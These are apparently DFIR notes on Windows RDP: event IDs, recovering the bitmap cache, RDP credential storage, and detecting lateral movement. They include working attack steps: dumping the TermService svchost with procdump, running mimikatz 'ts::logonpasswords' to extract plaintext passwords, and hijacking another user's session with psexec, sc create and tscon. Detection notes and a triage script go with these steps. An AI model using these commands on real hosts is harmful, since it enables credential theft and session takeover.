RDP

Event Logs:

Reconnect: 4778 / Disconnect: 4779

Forensics:

Source and Destination artifacts:

Bitmap Cache

The bitmap cache stores static image tiles from an RDP session so that they can be referenced again instead of retransmitted. Its purpose is to optimize the RDP session.

We can leverage this artifact to recover what the TA saw during the RDP session. It is useful for proving what a TA opened or which actions they performed.

File Location:

  • C:\Users\USERNAME\AppData\Local\Microsoft\Terminal Server Client\Cache\*

Cache files are stored in .bin files.

Execute bmc-tools:

bmc-tools.py -s ./ -d ./output

The output images will be saved to output folder.

We can then stitch together these image pieces using RDP Cache Stitcher.

Grab the compiled release version of the software and then open up the directory the image tiles are stored in. We can then stitch together tiles to make a complete image.

RDP Clipboard Forensics

RDP Lateral Movement

RDP credentials are stored in LSASS of the target computer. The plaintext passwords can be dumped from LSASS using mimikatz.

Introduced in Windows Server 2012 R2 and Windows 8.1, Restricted Admin mode provides additional security to remote logon scenarios. This mode of Remote Desktop causes the client application to perform a network logon challenge-response with the NT one-way function (NTOWF) or use a Kerberos service ticket when authenticating to the remote host. After the administrator is authenticated, the administrator does not have the respective account credentials in LSASS because they were not supplied to the remote host. Instead, the administrator has the computer account credentials for the session. Administrator credentials are not supplied to the remote host, so actions are performed as the computer account. Resources are also limited to the computer account, and the administrator cannot access resources with his own account.

Dump Passwords in Terminal Services:

  1. Query svchost running Terminal Services.

#service
sc queryex termservice

#task running rdpcorets
tasklist /M:rdpcorets.dll

#netstat for TermService
netstat -nob | Select-String TermService -Context 1
  2. Dump the process or select-string for the password in memory.

#select string for password hint, difficult to find unless you know it.
strings -el svchost* | grep Password123 -C3

#dump process with task manager or procdump
procdump64.exe -ma 988 -accepteula C:\Users\pentestlab

#mimikatz rdp extract
privilege::debug
ts::logonpasswords

Detection:

  • Look for .dmp files on the host.

Dump saved credentials via DPAPI:

Credential Manager Location:

  • C:\Users\username\AppData\Local\Microsoft\Credentials

  • Credentials are stored in Credential Manager, not in .rdp files.

  • .rdp files reference credential manager for creds.

Detection:

Tscon to hijack open RDP connections:

  1. Requires SYSTEM privs to accomplish.

psexec -s \\localhost cmd

Another method is to create a service that will connect the selected session to ours.

  1. Get all sessions information:

C:\Windows\system32>query user
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 administrator                             1  Disc            1  3/12/2017 3:07 PM
>localadmin            rdp-tcp#55          2  Active          .  3/12/2017 3:10 PM

C:\Windows\system32>
  2. Create a service which will hijack the user's session:

C:\Windows\system32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
[SC] CreateService SUCCESS
  3. Start the service:

net start sesshijack

Detection:

  • Event IDs 4778 (session reconnect) and 4779 (session disconnect) can be used to figure out which desktop sessions got disconnected/reconnected.

  • Tscon running as SYSTEM

  • Tscon executed as SYSTEM from persistence method scheduled task, service, WMI, etc.
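As an added example (not part of the original notes), the two detection ideas above as a small Python triage script. It runs over constructed sample records shaped like the Security log fields of 4778/4779 and 4688 events, flags tscon.exe launched as SYSTEM (noting whether its parent is a service/task/WMI host), and pairs each reconnect with the account's last disconnect to spot a session that came back from a different client. The field names follow the Security log; the sample values are made up.

```python
# Constructed sample events shaped like Security log fields for 4779 (session
# disconnected), 4688 (process creation) and 4778 (session reconnected). Made up.
SAMPLE_EVENTS = [
    {"EventID": 4779, "AccountName": "administrator", "SessionName": "RDP-Tcp#12",
     "ClientName": "WS-FIN-07", "ClientAddress": "10.1.5.23", "Time": "15:07"},
    {"EventID": 4688, "SubjectUserName": "SYSTEM",
     "NewProcessName": r"C:\Windows\System32\tscon.exe",
     "ParentProcessName": r"C:\Windows\System32\services.exe",
     "CommandLine": "tscon 1 /dest:rdp-tcp#55", "Time": "15:21"},
    {"EventID": 4778, "AccountName": "administrator", "SessionName": "RDP-Tcp#55",
     "ClientName": "SRV-APP01", "ClientAddress": "LOCAL", "Time": "15:21"},
]

SYSTEM_ACCOUNTS = {"SYSTEM", "NT AUTHORITY\\SYSTEM"}
# Parents that suggest tscon was launched by a service, scheduled task or WMI
# (the persistence methods named above) rather than from an interactive shell.
PERSISTENCE_PARENTS = {"services.exe", "svchost.exe", "wmiprvse.exe", "taskeng.exe"}

def tscon_as_system(events):
    """Flag 4688 events where tscon.exe runs as SYSTEM (the privilege level the
    hijack needs) and record whether its parent looks like a persistence host."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4688:
            continue
        if not ev["NewProcessName"].lower().endswith("\\tscon.exe"):
            continue
        if ev["SubjectUserName"].upper() not in SYSTEM_ACCOUNTS:
            continue
        parent = ev["ParentProcessName"].rsplit("\\", 1)[-1].lower()
        via = "persistence parent" if parent in PERSISTENCE_PARENTS else "interactive"
        hits.append((ev["Time"], ev["CommandLine"], via))
    return hits

def reconnects_from_new_client(events):
    """Pair each 4778 with the account's most recent 4779 and flag reconnects
    that arrive from a different client than the one that disconnected."""
    last_disconnect = {}
    hits = []
    for ev in events:
        if ev.get("EventID") == 4779:
            last_disconnect[ev["AccountName"]] = (ev["ClientName"], ev["ClientAddress"])
        elif ev.get("EventID") == 4778:
            before = last_disconnect.get(ev["AccountName"])
            now = (ev["ClientName"], ev["ClientAddress"])
            if before is not None and before != now:
                hits.append((ev["Time"], ev["AccountName"], before, now))
    return hits
```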

Rogue RDP:

RDP Files:

.rdp files are plaintext config files.

  • Credentials are stored in Credential Manager, not in .rdp files.

  • .rdp files reference credential manager for creds

Anti-Forensics:

Sources:

  • 13Cubed: RDP Log Hunting
  • Windows OS Hub: Tracking and Analyzing Remote Desktop Connection Logs in Windows
  • Windows Security Log Event ID 4624 - An account was successfully logged on (4624 Logon, Microsoft)
  • Altered Security: Fantastic Windows Logon types and Where to Find Credentials in Them (Logon Types and Mimikatz Impact)
  • Microsoft Learn: 4779(S) A session was disconnected from a Window Station (4779 Disconnects from session)
  • Microsoft Learn: 4778(S) A session was reconnected to a Window Station (4778 Reconnect to existing session)
  • All Things DFIR: Do You Even Bitmap Cache, Bro?
  • GitHub - ANSSI-FR/bmc-tools: RDP Bitmap Cache parser
  • GitHub - BSI-Bund/RdpCacheStitcher: a tool that supports forensic analysts in reconstructing useful images out of RDP cache bitmaps
  • How to Perform Clipboard Forensics: ActivitiesCache.db, Memory Forensics and Clipboard History
  • Microsoft Docs: Credentials Processes in Windows Authentication
  • n00py: Dumping Plaintext RDP credentials from svchost.exe
  • Penetration Testing Lab: svchost
  • Passwordless RDP Session Hijacking Feature All Windows versions
  • Red Team Notes: RDP Hijacking for Lateral Movement with tscon
  • Black Hills Information Security: Rogue RDP – Revisiting Initial Access Methods
  • Super User: How to save RDP credentials into a file?
  • Medium: Delete Recent RDP History Entries from the Start Menu and Taskbar (JumpList)